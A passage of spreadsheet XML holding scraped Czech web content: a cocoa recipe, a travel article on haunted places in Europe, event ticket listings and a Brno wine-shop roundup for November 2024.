Lahodné kakao zahřeje tělo i duši Pokud se necítíte na velké experimentování, a přitom stále toužíte překvapit své blízké netradiční volbou chutí, nezoufejte! Vsaďte na netradiční zpracování notoricky známého nápoje pro dospělé i děti. Kdo by nechtěl ochutnat lahodné krémové horké kakao, které v sobě skrývá nádech kokosu, vanilky a koření? Na přípravu kokosového kakaa budeme potřebovat 400 ml kokosového mléka, ke kterému do hrnce přidáme 2 polévkové lžíce Přírodního kakaa Dr. Oetker a dobře promícháme. Poté přidáme 2 polévkové lžíce kokosového cukru a směs zahřejeme, ale nevaříme! Před podáváním ozdobíme špetkou mleté skořice a kardamomu a dochutíme 1 kávovou lžičkou vanilkového extraktu Bourbon Vanilka Madagaskar Dr. Oetker. Takto připravené kakao podáváme horké podle chuti, posypané kakaem a nastrouhanou hořkou čokoládou. Více chutných receptů naleznete na webu: Naše recepty | Dr. Oetker . Redakce FFN Autor: Jakub Míšek Autor person Jakub Míšek</t>
  </si>
  <si>
    <t>560</t>
  </si>
  <si>
    <t>528</t>
  </si>
  <si>
    <t>20241101_644_3239765064_d34d06b88f934c47e540.html</t>
  </si>
  <si>
    <t>d34d06b88f934c47e540</t>
  </si>
  <si>
    <t>Strašidelná Evropa: Nejtajemnější místa, kde ožívají mrazivé legendy</t>
  </si>
  <si>
    <t>Strašidelná Evropa : Nejtajemnější místa, kde ožívají mrazivé legendy Strašidelná místa Evropy Shutterstock Znáte legendy o místech v Evropě opředených mrazivým tajemstvím? Najdete je mezi nádhernými památkami, opuštěné v malebné krajině i v ruchu velkoměst. Pokud máte pro strach uděláno, vydejte se s námi na cestu opředenou temnými příběhy. Zavede vás do částí starého kontinentu, kde hororové příběhy dostávají reálnou podobu. A kdoví, třeba si návštěvou strašidelných míst okořeníte letní dovolenou... Pařížské katakomby, Francie Pařížské katakomby Shutterstock Věděli jste, že pod romantickou Paříží vede spleť strašidelných labyrintů? Přímo pod centrem města zamilovaných se totiž v tajemných katakombách uchovávají ostatky milionů Pařížanů. Místo přezdívané jako „největší hrob světa“ odkazuje na temnou část francouzské historie. Tunely, které vznikly původně jako starověké kamenné lomy, se v 18. století staly obrovským pohřebištěm. Úmrtnost Pařížanů v důsledku morových ran stále stoupala, městské hřbitovy byly však přeplněné. Proto více než 6 milionů lidí našlo odpočinek mezi vápencovými zdmi pod povrchem francouzské metropole. Během návštěvy budete svědky netradiční výzdoby tunelů – stěny katakomb pokrývají hromady lebek a kostí. Veřejnosti je přístupná omezená část katakomb, ale i ta stačí k navození dojmu, že jste právě vstoupili do světa mrtvých. Prostorem se nese zvláštní a tísnivá atmosféra, která vám společně s tragickou historií místa nažene husí kůži. Legenda praví, že v katakombách mohou bloudit duchové těch, kteří tu byli pohřbeni. Takže až se budete procházet v temných chodbách mějte oči otevřené a uši nastražené. Možná uslyšíte tlumené zvuky zvenčí, možná zvuky ze záhrobí... Dovolená ve Francii Transylvánie , Rumunsko Drákulův hrad, Transylvánie Shutterstock Fanouškům hororů netřeba Transylvánii dlouze představovat. V této hornaté oblasti Rumunska totiž poznají domovinu hraběte Drákuly z románu irského spisovatele Brama Stokera . Mezi malebnou krajinou a horskými vrcholky najdete bájný hrad Bran, který je s urozeným upírem neodmyslitelně spjat. Za jeho fasádou z 15. století se totiž odehrával mrazivý kus historie. Sídlili tu král Ferdinand I., královna Marie, ale i valašský kníže Vladan III. Tepes. Krutý panovník přezdívaný Vladan Napichovač se stal předlohou slavného románu i jeho pozdějších filmových zpracování. Co je na mrazivých legendách pravdy, se nyní už přesně nedozvíme, ale faktem zůstává, že jeho nekompromisní způsob vlády z něj učinil jednoho z nejkrutějších vládců evropské historie. Ke krajině obklopené Karpaty se váží i další strašidelné příběhy. Opřádají také historické město Brašov , kde můžete obdivovat impozantní barokní památky v čele s Černou katedrálou. Jedna z legend praví, že katedrála získala svůj název po katastrofálním požáru v 17. století, kdy stěny zčernaly od kouře a sazí. Jiný bájný příběh odkazuje na období morové epidemie přezdívané černá smrt. Město Brašov , stejně jako většina Evropy , bylo morem těžce zasaženo. Věřící, kteří se usilovně modlili v této katedrále, se podle legendy jako mávnutím kouzelného proutku uzdravili. Čtěte také: Památka zesnulých ve světě: Rej plný barev, svíček a vzpomínek Ostrov Poveglia, Itálie Ostrov Poveglia, Itálie Shutterstock Pro všechny, kdo hledají více než klasickou turistiku, bude zajímavým cílem italský ostrov Poveglia. Tento malý a neobydlený kus pevniny v benátské laguně je známý zejména pro svou děsivou minulost. Ostrov je obrovským kontrastem k barevným a živoucím Benátkám , v minulosti totiž sloužil jako poslední štace pro lidi umírající na dýmějový mor. Popel zemřelých je prý dodnes součástí ostrovní půdy. Další smutnou etapou bylo pro Poveglii období počátku 20. století, kdy tu sídlila psychiatrická léčebna. Za jejími zdmi se totiž odehrávalo brutální násilí. Na týraných pacientech chorobomyslný lékař prováděl experimenty, včetně lobotomie mozku. Sám nakonec zešílel a spáchal sebevraždu. Budova léčebny byla nakonec v roce 1968 uzavřena a ostrov je od té doby zcela opuštěný. Díky své pověsti o strašidelných jevech se toto místo objevuje v hledáčku lovců duchů i nadšenců paranormálních jevů. Zájezdy do Itálie Palác Beau-Séjour, Portugalsko Zámek Beau-Séjour, Lisabon Shutterstock Slunné pláže, surfařský ráj, opojné víno a starobylá města, to jsou hlavní lákadla, za kterými se světoběžníci vypraví do Portugalska . Mrazivé tajemství však skrývá i zdejší hlavní město. Patříte-li k milovníkům tajemna, pak byste v lisabonských ulicích neměli minout palác Beau-Séjour, o kterém se vypraví, že je jedním nejstrašidelnějších míst Pyrenejského poloostrova. V jeho chodbách prý dodnes straší bývalý obyvatel paláce, baron z Glórie. Jak jinak si totiž vysvětlit sérii paranormálních jevů, které se tu dějí? Samovolně se tu pohybuje nábytek, z prázdných pokojů se ozývají podivné zvuky, za dveřmi jsou slyšet kroky. Někteří návštěvníci romantického sídla šlechtických rodů tu dokonce spatřili samotného barona, jak prochází palácem nebo zahradami. Chcete-li se o přítomnosti nadpřirozených sil přesvědčit sami, stačí když sem zacílíte svůj příští výlet. Kromě podivuhodných událostí tu budete svědkem krásné architektonické práce a kulturního bohatství země. Dovolená v Portugalsku Zámek Wolfsegg, Německo Zámek Wolfsegg, Německo Shutterstock Na první pohled je zámek Wolfsegg perlou barokní tvorby jako vystřižené z pohádky. Pokud se však podíváte pod pokličku, zjistíte, že patří k nejděsivějším stavbám v Německu . Zvěsti o strašidlech tu mají hluboké kořeny, sahají až do roku 1500. V té době zámecký pán Ulrich von Laber zjistil, že má jeho žena poměr. Rozhodl se, že tomu učiní přítrž jednou provždy a zabil ji. Její duch však mezi hradními zdmi zůstal a dodnes se prý na chodbách zámku zjevuje jako Bílá paní. Smrt Kláry von Helfstein není však jedinou tragickou událostí, která se na zámku odehrála. Dokazuje to série neobvyklých událostí. Kromě Bílé paní tu návštěvníci zaslechli zvláštní zvuky, kroky, šeptání nebo pocítily náhlé změny teploty. Místní věří, že hrad je prokletý a pronásledují ho duše těch, kteří zde přišli o život. Pokud duchové zrovna nestraší v zámeckém prostředí, ukrývají se prý v nedaleké jeskyni. Čtěte také: Poznávejte evropské metropole: Zažijte eurovíkend v Římě , Paříži či Barceloně Zugarramurdi, Španělsko Vesnička Zugarramurdi, Španělsko Shutterstock V provincii Navarra najdete kromě přírodních pokladů také vesničku Zagarramurdi, která vypráví příběh španělských čarodějnických procesů. Její návštěva vás přenese do období 17. století, kdy se v tamních jeskyních prováděly temné čarodějnické rituály, které vrchnost označila jako nebezpečné sabaty a vzývání ďábla. Tato obvinění vedla k několika soudním procesům a obvinění řady žen, z nichž část byla upálena na zugarramurdijské hranici. Řádění tehdejší inkvizice platí za nejznámější případ honu na čarodějnice v historii Španělska . Události připomíná Muzeum čarodějnictví, kde budete mít šanci poznat historický kontext procesů i místní tradice a folklór. Dnes je Zagarramurdi klidnou vesnicí, která přitahuje turisty nejen svou bohatou historií, ale i krásným přírodním prostředí. Toulat se v okolních lesech či horách pohladí na duši nejen milovníky záhad. Zájezdy do Španělska Frangokastello, Řecko Hrad Frangokastello, Kréta Shutterstock Řecký ostrov Kréta je znám jako oblíbená prázdninová destinace plná slunečních paprsků a šumících mořských vln. Romantické pobřeží si oblíbili nejen rekreanti z celého světa, ale zalíbilo se tu i nadpřirozeným bytostem. O jejich přítomnosti vypráví historická pevnost Frangokastello, která se tyčí přímo nad hladinou Lybijského moře. Každoročně sem 17. května přicházejí duchové, aby oslavili výročí bitvy, která otřásla jihem ostrova v 19. století v rámci války za nezávislost. Vojáci se zjevují v podobě stínů na hradních stěnách, slyšet jsou navíc bojové pokřiky. Chcete-li si okořenit svou letní dovolenou na řeckém ostrově, vypravte se na výlet do vesnice Frangokastello . Dech se vám zatají nejen vlivem nadpřirozených sil, ale také nad přírodními krásami Kréty a místním neopakovatelným výhledům. Dovolená na Krétě Čachtický hrad, Slovensko Čachtický hrad, Slovensko Shutterstock Za mrazivými zážitky nemusíte jezdit příliš daleko, stačí, když se vypravíte na Slovensko , kde se vysoko nad lesy tyčí Čachtický hrad. Malebná krajina není jediným důvodem věhlasu tohoto místa, svůj lví podíl nese zejména temná historie. Hlavní roli tajemných příběhů sehrává Alžběta Báthoryová zvaná Čachtická paní, která je považována za jednu z nejznámějších sériových vražedkyň v historii. Krvavá hraběnka měla totiž podle bájných legend vraždit mladé dívky a následně se koupat v jejich krvi. V tom podle ní tkvělo tajemství receptury na věčné mládí. Říká se, že v obklopení svých služebnic prováděla temné rituály a pohřební obřady. Jakkoli se nám tyto příběhy mohou zdát neuvěřitelné, faktem zůstává to, že v blízkosti hradu tou dobou podezřele často mizely mladé dívky. Dodnes se proslýchá, že v noci se z hradu ozývají podivné výkřiky. Jisté je jediné: toto tajuplné místo by nemělo uniknout žádnému milovníkovi historie. Příjemným bonusem výletu se stane i putování krajinou, která svou krásou kompenzuje temnou atmosféru místa. Cestujte bez obav: Nabízíme komplexní cestovní pojištění Autor: Tereza Siegertová Autor person Tereza Siegertová</t>
  </si>
  <si>
    <t>34860</t>
  </si>
  <si>
    <t>45010</t>
  </si>
  <si>
    <t>20241101_645_3239759416_d2c4d8d18760301b2678.html</t>
  </si>
  <si>
    <t>d2c4d8d18760301b2678</t>
  </si>
  <si>
    <t>Ecstatic Dance Mikulov- Mikulov- Studio Yoga Oáza, 1. května 1696/1, Mikulov</t>
  </si>
  <si>
    <t>Ecstatic Dance Mikulov- Mikulov - Studio Yoga Oáza, 1. května 1696/1, Mikulov Studio Yoga Oáza, 1. května 1696/1, Mikulov Cena:390 Kč KOUPIT VSTUPENKY Popis kulturní akce Ecstatic Dance Mikulov- Mikulov Přinášíme ECSTATIC DANCE do Mikulova . ECSTATIC DANCE je jedinečná příležitost být sám sebou a vyjádřit se tancem, pohybem těla. Nemusíte umět taneční kroky, ani se nijak připravovat. Vytváříme bezpečné místo, kde má každý možnost otevřít se, uvolnit nebo hluboko ponořit do svého nitra. Čeká nás zahajovací kruh s medicínou kakaa a živým bubnováním. Ten nás uklidní, ukotví do bezpečí a naladí na následný taneční DJ set. Můžeme tančit, skákat, spontánně se hýbat a vyjadřovat pohybem, také poslouchat, být a vnímat energii. Závěrečná ceremonie nás propojí do vzájemné laskavosti. PROGRAM 18:00 otevření prostoru 18:15 společné zahájení 19:00 taneční DJ set 20:30 závěrečný kruh PRAVIDLA ECSTATIC DANCE - při tanci nemluvíme - jsme bez vlivu jakýchkoliv drog nebo alkoholu - tančíme bez bot CENA 390 Kč v předprodeji do 30. 10. 2024 450 Kč na místě KDY A KDE Pátek 1. 11. 2024 18:00 - 21:00 Studio Yoga Oáza Mikulov Váš e-mail: E-mail příjemce: Předmět: Zpráva: Ochrana proti spamu. Kolik je dvakrát tři? Předmět: Zpráva: Ochrana proti spamu. Kolik je dvakrát tři?(číslovka) O nás Prodej vstupenek na koncerty, festivaly, do divadel, na sportovní akce, akce pro děti a na další kulturní akce. Provozovatel Provozovatel stránek www.kultura365.cz funguje jako zprostředkovatel (zobrazovatel) služeb nabízených tímto serverem, a nenese odpovědnost za poskytnutí služeb nebo jejich kvalitu třetí stranou. Provozovatel není poskytovatelem těchto služeb. Provozovatel nenese žádnou odpovědnost za ceny, termíny a informace zobrazené na těchto stránkách. Nabídka Autor: info@kultura365.cz</t>
  </si>
  <si>
    <t>1240</t>
  </si>
  <si>
    <t>457000</t>
  </si>
  <si>
    <t>20241101_646_3239759412_34d201bd90fcd9f2f546.html</t>
  </si>
  <si>
    <t>34d201bd90fcd9f2f546</t>
  </si>
  <si>
    <t>Sergei Barracuda / MusicBar Drago Kopřivnice- Kopřivnice- MusicBar- Kopřivnice Kopřivnice</t>
  </si>
  <si>
    <t>Sergei Barracuda / MusicBar Drago Kopřivnice- Kopřivnice - MusicBar- Kopřivnice Kopřivnice Sergei Barracuda / MusicBar Drago Kopřivnice- Kopřivnice pátek KOUPIT VSTUPENKY Popis kulturní akce Sergei Barracuda / MusicBar Drago Kopřivnice- Kopřivnice SERGEI BARRACUDA podruhé v Kopřivnici 01.11.2024 21:00 - 04:00 MusicBar Drago Kopřivnice ----------------------------- Platinový rapper z Ostravy a kmotr žánru TRAP! Ano, to je Sergei B! Podruhé zavítá do Kopřivnice do MusicBar Drago Na této akci nesmíš chybět! Po celý večer skvělá hudba, od začátku až do konce! Můžete se těšit na: VIP vstupenky! Skvělé posezení! Spoustu alkoholu ! Skvělou zábavu po celý večer! Váš e-mail: E-mail příjemce: Předmět: Zpráva: Ochrana proti spamu. Kolik je dvakrát tři? Předmět: Zpráva: Ochrana proti spamu. Kolik je dvakrát tři?(číslovka) O nás Prodej vstupenek na koncerty, festivaly, do divadel, na sportovní akce, akce pro děti a na další kulturní akce. Provozovatel Provozovatel stránek www.kultura365.cz funguje jako zprostředkovatel (zobrazovatel) služeb nabízených tímto serverem, a nenese odpovědnost za poskytnutí služeb nebo jejich kvalitu třetí stranou. Provozovatel není poskytovatelem těchto služeb. Provozovatel nenese žádnou odpovědnost za ceny, termíny a informace zobrazené na těchto stránkách. Nabídka Autor: info@kultura365.cz</t>
  </si>
  <si>
    <t>20241101_647_3239761137_a59eacad950e61ebc855.html</t>
  </si>
  <si>
    <t>a59eacad950e61ebc855</t>
  </si>
  <si>
    <t>Novinky brněnských vinoték – listopad 2024</t>
  </si>
  <si>
    <t>Novinky brněnských vinoték – listopad 2024 Brno , 1. listopadu 2024 – Listopad patří oslavám mladých vín a hned devět novinek se nám sešlo v přehledu. Vždy jde o vína raných aromatických odrůd, svěží, s vyšší kyselinkou a nezřídka i se zbytkovým cukrem. Müller Thurgau Mladé víno 2024 pozdní sběr, suché VÍNO HRUŠKA Morava , Slovácká, Blatnička, Novosady 179 Kč (HRU) Zbytkový cukr 8,3 g/l, kyseliny 6,4 g/l, alkohol 12,5 %. Vlaštovka je posel mladých vín ročníku 2024, která přinášejí lehkost a jiskrnou naději nové úrody. Víno je vyrobeno pro radost a touhu poznání všeho nového, stejně jako vlaštovka oznamuje nové začátky. Plná ovocná až kořenitá vůně s tóny zralého angreštu a meruňky, která se zrcadlí do chuti. Sběr 10. 9. 2024 při cukernatosti hroznů 23,8 °ČNM. Modrý Portugal Mladé víno 2024 výběr z hroznů, suché VÍNO HRUŠKA Morava , Slovácká, Blatnička, Novosady 179 Kč (HRU) Zbytkový cukr 0,4 g/l, kyseliny 5,3 g/l, alkohol 14 %. Barva hluboká až granátově červená. Vůně ostružin a švestkových povidel, která se zrcadlí do chuti a připomíná babiččin drobenkový koláč. Sběr 8. 10. 2024 při cukernatosti hroznů 26,8 °ČNM. Müllerka 2024 moravské zemské víno , suché Vinařství Bílkovi Morava , Velkopavlovická, Velké Bílovice 160 Kč (DEG) Bílé suché víno s 12 % alkoholu , 5,2 g/l zbytkového cukru a 4,9 g/l kyselin. Šťavnaté svěží víno , ovocné chuti s jemnou kyselinkou. LAHOFER '24 2024 moravské zemské víno , polosuché Vinařství LAHOFER Morava , Znojemská 130 Kč (MBV, NCK, PER, UZM, VGA, VUD) Alkohol 11,5 %, zbytkový cukr 15,6 g/l, kyseliny 6,5 g/l. Svěží bílé cuvée z odrůd Müller Thurgau a Muškát moravský s opojnou vůní čerstvých citrusových plodů. V chuti okouzlí příjemně živelnou kyselinou a líbivými tóny po červeném pomeranči. Solaris frizzante mladé víno 2024 moravské zemské víno , polosladké Vinařství Vajbar Morava , Velkopavlovická 149 Kč (ROU, VGA, VUR) Jemné perlení Frizzante Solaris zvýrazní mládí a svěžest vína , opulentní zbytkový cukr přitáhne svou oblostí a hebkostí, svěží mladistvá kyselina v závěru vtáhne zpět do hry. Navíc k nasycení vína byl použit přírodní CO2, který vznikl při kvašení hroznů. Barva je bledě zlatá. Vůně je velmi bohatá, přináší tóny kvetoucích stromů, letního ovoce, jemného koření. V závěru meloun Galia a dýňová marmeláda. Chuť je hladká, mazlivá, od počátku nasládlá. Najdeme v ní všechny tóny vůně, které v dlouhém závěru příjemně osvěžuje červený grep. Doporučujeme k cheese cake s mangem. Martin Bílý Hibernal 2024 moravské zemské víno , polosladké Vinařství HANZEL Morava , Znojemská 130 Kč (MBV, NCK, PER, UZM, VGA, VUD) Alkohol 10,5 %, zbytkový cukr 32,5 g/l, kyseliny 7,3 g/l. Prvním bílým vínem nového ročníku je polosladký Hibernal s vůní vyzrálých citrusů a s neskutečně šťavnatou a ovocitou chutí připomínající žlutomasou broskev nebo pomelo. Frizzante Muškát moravský 2021 moravské zemské víno , polosuché Vinařství Pavel Veselský Morava , Slovácká, Nový Poddvorov, Remíz 198 Kč (VVK) Jemně zlatavá barva se studeným podtónem a vyšší viskozitou. Středně intenzivní odrůdově typická aromatika nasládlých květů, připomínající květy pomerančovníku. V chuti je víno vyzrálejší a harmonické s dominantním ovocným projevem zralých broskví a žlutých jablek, jež doplňují podtóny zralých rynglí. Víno má střední perlení. Je vhodné ho snoubit s broskvovou marmeládou nebo koláčem. Alkohol 12 %, zbytkový cukr 13,6 g/l, kyseliny 6,7 g/l. Svatovavřinecké rosé Mladé víno 2024 pozdní sběr, polosuché VÍNO HRUŠKA Morava , Slovácká, Blatnička, Novosady 179 Kč (HRU) Zbytkový cukr 12,8 g/l, kyseliny 7,4 g/l, alkohol 11,5 %. Barva lehká starorůžová. Vůně evokuje třešně, maliny, brusinky a drobné bobulovité ovoce. Sběr 19. 9. 2024 při cukernatosti hroznů 22,4 °ČNM. Martin Růžový Modrý Portugal 2024 moravské zemské víno , polosuché Vinařství HANZEL Morava , Znojemská 140 Kč (MBV, NCK, PER, UZM, VGA, VUD) Alkohol 11,5 %, zbytkový cukr 16,0 g/l, kyseliny 6,5 g/l. Polosuché růžové víno z odrůdy Modrý Portugal, jehož buketu vévodí vůně pivoněk a třešní srdcovek. Ty hrají prim i v jeho lahodné chuti nepostrádající svou mladistvou svěžest. LAHOFERka '24 2024 moravské zemské víno , polosladké Vinařství LAHOFER Morava , Znojemská 140 Kč (MBV, NCK, PER, UZM, VGA, VUD) Alkohol 10,5 %, zbytkový cukr 32,0 g/l, kyseliny 7,7 g/l. Růžové víno z odrůdy Svatovavřinecké s nasládlou vůní kompotovaných jahod a nádechem červeného rybízu. Šťavnaté chuti dominují tóny malin, červenorybízová stopa jí dodává na svěžesti. Zweigeltrebe klaret 2023, polosladké Vinařství Damborský Morava , Velkopavlovická, Velké Bílovice 169 Kč (VVK) Barva je jemně narůžovělá, ústřicová se stříbrným podtónem. Víno má ovocnou vůni s malinovým nádechem, odráží se zde bobulové, lesní ovoce ve svěží variantě. Chuti dominuje nasládlost a tropické ovoce, intenzivní je v tomto víně žlutý meloun, mango a liči. Celý dojem vína harmonizuje krémové aroma, které přechází i do chuti. Ideální je snoubit víno s krémovými dezerty s ovocnou polevou. Alkohol 10,5 %, zbytkový cukr 38 g/l, kyseliny 8,7 g/l. Ryzlink rýnský 2022 pozdní sběr, polosuché Rodinné vinařství VICAN Morava , Mikulovská, Mikulov , Kieneberg 259 Kč (VGA) Zbytkový cukr: 10,9 g/l, kyseliny 7,3 g/l, alkohol 13 %. Zelenkavá barva se zlatými odlesky. Intenzivní aroma zralých broskví a květů lípy. Chuť je velmi šťavnatá, minerální s pikantní perzistencí. Toto víno se skvěle hodí ke grilovanému pstruhovi se špenátem a opékanými bramborami. Stříbrná medaile – Portugal Wine Trophy 2024 Zlatá medaile – Festwine 2024 ( Velké Pavlovice ) Cabernet blanc 2022 výběr z hroznů, polosladké Vinařství Štěpán Maňák Morava , slovácká, Žádovice , Fěruňk 209 Kč (OBE) Alkohol 13,0 %, zbytkový cukr 42,3 g/l, kyseliny 6,7 g/l. Průzračně zářivé víno s jantarovými odlesky, velmi dobré viskozity. Vůně je čistá, s nádechem sušených křížal. Chuť je plnější, ovocně kořenitá, připomínající karamel. Středně dlouhý závěr. Frankovka 2023 výběr z hroznů, suché Vinařství Baláž Morava , Mikulovská, Dolní Dunajovice , Dunajovský kopec 260 Kč (ČER) Zbytkový cukr 0,2 g/l, kyselina 6,7 g/l a alkohol 13,5 %. Víno tmavě rubínové barvy s postupně se otevírající aromatikou s tóny červeného a černého bobulového a peckového ovoce, sušeného zázvoru a lékořice v závěru s nádechem exotického koření a lehké zemitosti. Patro vína je suché se svěží kyselinou, rozvíjejícím se ovocným tříslem a středně dlouhou dochutí. Doporučujeme k růžovým a červeným masům a kvalitním uzeninám. Prague Premium Gold – Prague Wine Trophy 2024 ( Praha ) Uvedené ceny jsou doporučené koncové, včetně DPH. Jsou platné v den uveřejnění článku a můžou se tak výrazně lišit od aktuální nabídky. Jan Přikryl, Tato emailová adresa je chráněna před spamboty, abyste ji viděli, povolte JavaScript Přehled vinoték – listopad 2024 ČER – Černá růže DEG – Degustárna – Vína z Velkých Bílovic HRU – Víno Hruška MBV – Moravská banka vín NCK – Vinotéka NC Královo Pole OBE – Oberland PER – Vinotéka Perkmistr ROU – Vinotéka Roučí UZM – Vinný sklep U Žíznivého mnicha VGA – Vinná Galerie VUD – Vinárnička u Divadla VUR – Vinotéka u Romana Více v: Přehled brněnských vinoték</t>
  </si>
  <si>
    <t>612</t>
  </si>
  <si>
    <t>20241101_648_3239759780_744305e6af100971f37f.html</t>
  </si>
  <si>
    <t>744305e6af100971f37f</t>
  </si>
  <si>
    <t>HALLOWEENSKÝ ECSTATIC DANCE PRAGUE - DJ César Chunk (Peru)- Praha- BOTEL MARINA- Praha Praha</t>
  </si>
  <si>
    <t>HALLOWEENSKÝ ECSTATIC DANCE PRAGUE - DJ César Chunk ( Peru )- Praha - BOTEL MARINA- Praha Praha (okres Most ) 250,- První country bál v Atticu. Hrají PONTIAC a MAKOVEC. Předtančení MIX DANCE.Vstup od 18:00. Slevy ZTP, ZTP/P ani jiné nejsou poskytovány. Pá (okres Most ) 790,- Po vyprodaném loňském „dvojáku“ v pražském O2 universu, kde kapela Škwor oslavila 25 let na scéně a pokřtila nové album Sobě věrnej, vyjela letos na jaře stále populárnější čtveřice na své do...více Pá (okres Most ) 690,- Po vyprodaném loňském „dvojáku“ v pražském O2 universu, kde kapela Škwor oslavila 25 let na scéně a pokřtila nové album Sobě věrnej, vyjela letos na jaře stále populárnější čtveřice na své dosud největší turné. Platinovou deskou Supraphonu ověnčenou albovou novinku i ...více Pá (okres Most ) 500 Kč Čeká nás další skvělý tanec, tentokrát v podání naší oblíbené djsky MAISHA COBRA. V Česku žije 12 let, ale její kořeny a duše pochází z Brazílie . Hudba, rytmus a pohyb jsou její extází, a odmalička jí doprovází afro-brazilská kultura a hudba. Její životní filoso...více Čt (okres Most ) 300 Kč Přijďte si užít první společný dvojkoncert originálních písničkářů Marie Tilšarové a Petra Lüftnera , naplněný radostí a životem. Těšit se můžete na jejich největší hity i nové skvělé písně.Marie Tilšarová je autentická písničkářka s mottem „Co žiju, zpívá...více Pá (okres Most ) 250,- Sharlota je česká rapperka a zpěvačka. Je držitelkou zlaté desky za své debutové album Sextape a vítězkou hudebních cen rádia Evropy 2 v kategorii Hip Hop a Rap CZ/SK 2022Vstup od 20:00. Slevy ZTP, ZTP/P ani jiné nejsou poskytovány. Vstupné na místě - 350 Kč. Pá (okres Most ) 200 Kč Nabušenej pražskej folk-punk už nebude ke slyšení jenom v Praze - spřátelené kapely Vintage Wine, Foggy Dude a Kalsarikännit ho v rámci Devil's Craic Tour přivezou i do Hradce Králové ! A to si přece nemůžete nechat ujít... St (okres Most ) 1990,- Vánoční koncert Lucie Bílé s klavírním doprovodem Petra Maláska . Vstup na akci od 18:00 Slevy ZTP, ZTP/P ani jiné nejsou poskytovány. Pá (okres Most ) 490,- Po vyprodaném loňském klubovém turné a extrémním zájmu předních českých rockových festivalů se eskadra PANOPTIKO vydává na podzimní „ĎÁBELSKÉ TOUR“. Před zrcadly a obrazy pln...více Pá (okres Most ) 500 Kč Srdcem muzikant, duší tanečník. DJingu se věnuje již neuvěřitelných 24 let. Hrál ve vyprodaných klubech, pro tisíce lidí na letních festivalech. Když před lety objevil Ecstatic Dance, doslova se zamiloval do možnosti hrát mnohem barevněji, s hlubším smyslem. V jeho rozmanité hu...více Pá (okres Most ) 310 Kč Kapela Mucha po více než dvou letech opět v Ponorce! Punková retardace z Brna v čele s muženou Nikolou Muchou prožívá domnělý energetický vrchol na předních příčkách svých vlastních hitparád. Jsou kr&amp;amp;aacu...více Pá (okres Most ) 315 Kč Pio Squad slaví čtvrt století, pojď to oslavit s náma! Doprovodný program, hosty a DJS brzy odtajníme.. Jihlava vstávat..teď je čas na RAP!! Pá (okres Most ) 790,- V pátek 18. dubna 2025 proběhne další ročník rockového festivalu MOST ROCKU DOST pod střechou Sportovní Haly Most . Pro milovníky poctivého rock´n´rollu zahraje kapela KRUCIPÜSK. Dále vystoupí rocková hudební skupina JAMARON, rock-metalová kapela z Chlumce nad Cidlinou KOMUNÁL, ...více Pá (okres Most ) 790,- Přijďte si užít koncert v rámci oslav 30 let kapely. Čeká vás večer na který nezapomenete, plný těch největších hitů z celé tvorby kapely Harlej. Předprodej v síti Ticketstream . Poskytované slevy ZTP...více &amp;lt;&amp;lt; &amp;lt; 1 &amp;gt; &amp;gt;&amp;gt; Popis kulturní akce HALLOWEENSKÝ ECSTATIC DANCE PRAGUE - DJ César Chunk ( Peru )- Praha Přátele s radostí vás zveme již tradičně na velice oblíbený Halloweenský Ecstatic Dance v kostýmech. Každý rok je tahle akce vyprodána. Můžete se těšit na speciální UV dekorace, UV malovaní na obličej a tajemnou energii svátku Samhaine , který půlí období mezi podzimní rovnodenností a zimním slunovratem. Je to hlavně čas, který odděluje od sebe období léta a období zimy. Pojďme si společně užít tento magický čas extatickým tancem v kostýmech! Buďte kreativní, fantazii se meze nekladou. Večerem vás provede skvělý DJ César Chunk. César Chunk je jihoamerický DJ a producent, v současnosti působící v Praze . Tropické vibrace, písně v málo známých jazycích a bubny splývající s elektronickými beaty jsou součástí jeho strhujícího rituálu. V jeho hudebním setu najdete zvuky probouzející instinkt, ochranu, lásku, živé rytmy, které zažehnou extázi na tanečním parketu až do těch nejintrospektivnějších melodií. Rozmanitost, multikulturalismus a etnické menšiny. Pro společnost, která se snaží kultivovat nové osobní přístupy prostřednictvím hudby ve spojení se světovými domorodými komunitami. Ecstatic dance je skvělou příležitostí, jak prožít bezprostředně sám sebe, a proto zde neužíváme žádné drogy či alkohol . Je to způsob, jak se uvolnit, vypnout mysl a naladit se na své srdce. Tanec je založen na intuitivním a svobodném pohybu, bez potřeby techniky nebo napodobování ostatních. Zároveň je ideální příležitostí, jak vystoupit z komfortní zóny a otevřít se. PROGRAM 18:30 Otevření prostoru 19:15-19:30 Warm up 19:30-21:30 Ecstatic dance set – DJ César Chunk 21:30-21:45 Uzavření kruhu 21:45-22:30 Volné spolubytí PRAVIDLA ECSTATIC DANCE - při tanci nemluvíme - jsme bez vlivu jakýchkoliv drog a nebo alkoholu - pro vytvoření bezpečného prostoru vás žádáme nepořizovat žádné snímky a videa - všichni tancujeme bez bot CENA V předprodeji do 26.10. 500,- V předprodeji do 31.10. 550,- Na místě 600,- PODPALUBÍ LODI MÁ OMEZENOU KAPACITU 150 LIDÍ * v online předprodeji je k dispozici 100 lístků ** zakoupený lístek v předprodeji je nevratný, lze ho převést na jiné jméno ▼ KDY A KDE? Pátek 1.11. 18:30-22:30 Botel Marina O nás Prodej vstupenek na koncerty, festivaly, do divadel, na sportovní akce, akce pro děti a na další kulturní akce. Provozovatel Provozovatel stránek www.kultura365.cz funguje jako zprostředkovatel (zobrazovatel) služeb nabízených tímto serverem, a nenese odpovědnost za poskytnutí služeb nebo jejich kvalitu třetí stranou. Provozovatel není poskytovatelem těchto služeb. Provozovatel nenese žádnou odpovědnost za ceny, termíny a informace zobrazené na těchto stránkách. Nabídka Autor: info@kultura365.cz</t>
  </si>
  <si>
    <t>20241101_649_3239759788_2500d891171918760a0c.html</t>
  </si>
  <si>
    <t>2500d891171918760a0c</t>
  </si>
  <si>
    <t>BIGGER 37: Grow Your Mo Bro- Praha- Heaven club- Praha Praha</t>
  </si>
  <si>
